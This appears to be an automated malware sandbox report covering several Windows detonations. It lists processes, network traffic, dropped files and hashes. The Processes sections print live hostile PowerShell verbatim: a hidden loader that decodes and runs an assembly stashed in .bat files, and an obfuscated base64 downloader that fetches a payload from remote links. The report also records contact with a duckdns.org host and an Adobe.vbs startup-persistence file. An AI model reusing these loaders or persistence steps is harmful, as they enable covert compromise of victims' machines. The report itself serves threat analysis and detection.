$Uyqgmoqrr.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wwtghi.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dsumix.cmd" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dsumix.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\wwtghi.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jdokds.duckdns.org | udp |
| GB | 57.128.155.22:8895 | jdokds.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5np0u1fr.3cu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1252-9-0x0000022049F00000-0x0000022049F22000-memory.dmp
memory/1252-10-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1252-11-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-12-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-13-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1252-14-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-15-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-16-0x0000022049C60000-0x0000022049CB3000-memory.dmp
memory/1252-17-0x0000022064810000-0x0000022064863000-memory.dmp
memory/2060-18-0x0000015558CA0000-0x0000015558CAF000-memory.dmp
memory/2060-19-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/2060-21-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-22-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-23-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-20-0x000001555A8E0000-0x000001555A8EE000-memory.dmp
memory/1252-27-0x0000022064810000-0x0000022064863000-memory.dmp
memory/1252-26-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/2060-28-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vxboda.bat
| MD5 | a27d0d05a470dc95f1c74c7861761e9f |
| SHA1 | c4533a4822975c7a6316e375e365df82676dce76 |
| SHA256 | 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7 |
| SHA512 | 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f |
memory/2060-33-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/376-34-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/376-35-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/376-36-0x0000000004960000-0x0000000004996000-memory.dmp
memory/2060-37-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-38-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/376-40-0x0000000005120000-0x0000000005748000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jznltd.bat
| MD5 | b73dc1ad88598d67c62f694c382be267 |
| SHA1 | 7a5574b1e22e860e71c47104a588cfbcc78f9a63 |
| SHA256 | 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687 |
| SHA512 | d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675 |
memory/376-44-0x0000000004E50000-0x0000000004E72000-memory.dmp
memory/376-45-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/376-48-0x0000000005840000-0x00000000058A6000-memory.dmp
memory/376-56-0x0000000005940000-0x0000000005C94000-memory.dmp
memory/3268-57-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/3268-58-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3268-59-0x0000000004F00000-0x0000000004F10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4267fc1e87ee23aeb8b9a7d0497091c5 |
| SHA1 | 59ddae7dc44b8317ff933ad113493eb1644c52c0 |
| SHA256 | ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d |
| SHA512 | 1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb |
memory/376-71-0x0000000005F50000-0x0000000005F6E000-memory.dmp
memory/3268-72-0x0000000006410000-0x000000000645C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wwtghi.bat
| MD5 | 7834dbd67492fa350447dbd5debda5fc |
| SHA1 | e008dff36158beb0425d32036d9f65d5653184bd |
| SHA256 | d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573 |
| SHA512 | 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a |
memory/376-76-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3268-77-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3268-78-0x0000000007680000-0x0000000007716000-memory.dmp
memory/3268-79-0x00000000068B0000-0x00000000068CA000-memory.dmp
memory/376-80-0x00000000064B0000-0x00000000064D2000-memory.dmp
memory/376-81-0x00000000077C0000-0x0000000007D64000-memory.dmp
memory/3268-82-0x0000000008900000-0x0000000008F7A000-memory.dmp
memory/376-85-0x00000000072B0000-0x00000000074E0000-memory.dmp
memory/3268-84-0x00000000077A0000-0x0000000007A38000-memory.dmp
memory/376-88-0x0000000007560000-0x000000000777E000-memory.dmp
memory/3268-86-0x0000000008280000-0x0000000008506000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dsumix.cmd
| MD5 | f95dfe17a283dbb9301936821032b9a4 |
| SHA1 | 357edc773d07784e7fd295c2b273305994789fc4 |
| SHA256 | 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c |
| SHA512 | 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
memory/376-94-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-95-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-96-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/2600-97-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/376-108-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3564-109-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/3564-110-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3564-111-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3268-121-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-122-0x0000000007460000-0x00000000076C2000-memory.dmp
memory/2600-123-0x0000000007D30000-0x0000000007F8C000-memory.dmp
memory/2600-124-0x0000000008030000-0x00000000080C2000-memory.dmp
memory/2600-125-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-126-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-128-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-130-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-132-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-134-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-136-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-138-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-140-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-142-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-144-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-146-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-148-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-150-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-152-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-154-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-156-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-158-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-160-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-162-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-164-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-166-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-168-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-170-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-172-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-174-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-176-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-178-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-180-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-182-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-184-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-186-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/3564-194-0x0000000006E80000-0x00000000070B2000-memory.dmp
memory/3268-193-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3564-196-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3564-204-0x0000000007130000-0x0000000007352000-memory.dmp
memory/3268-337-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/376-479-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3268-481-0x0000000004F00000-0x0000000004F10000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
157s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2280-0-0x00000174EB780000-0x00000174EB7A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klazp0bt.lvc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2280-10-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp
memory/2280-11-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-12-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-13-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-14-0x00007FFDD7DA0000-0x00007FFDD8861000-memory.dmp
memory/2280-15-0x00000174CF850000-0x00000174CF860000-memory.dmp
memory/2280-16-0x00000174CF850000-0x00000174CF860000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4788 wrote to memory of 2116 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4788 wrote to memory of 2116 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2116 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2116 wrote to memory of 1464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1464 wrote to memory of 3596 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1464 wrote to memory of 3596 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGED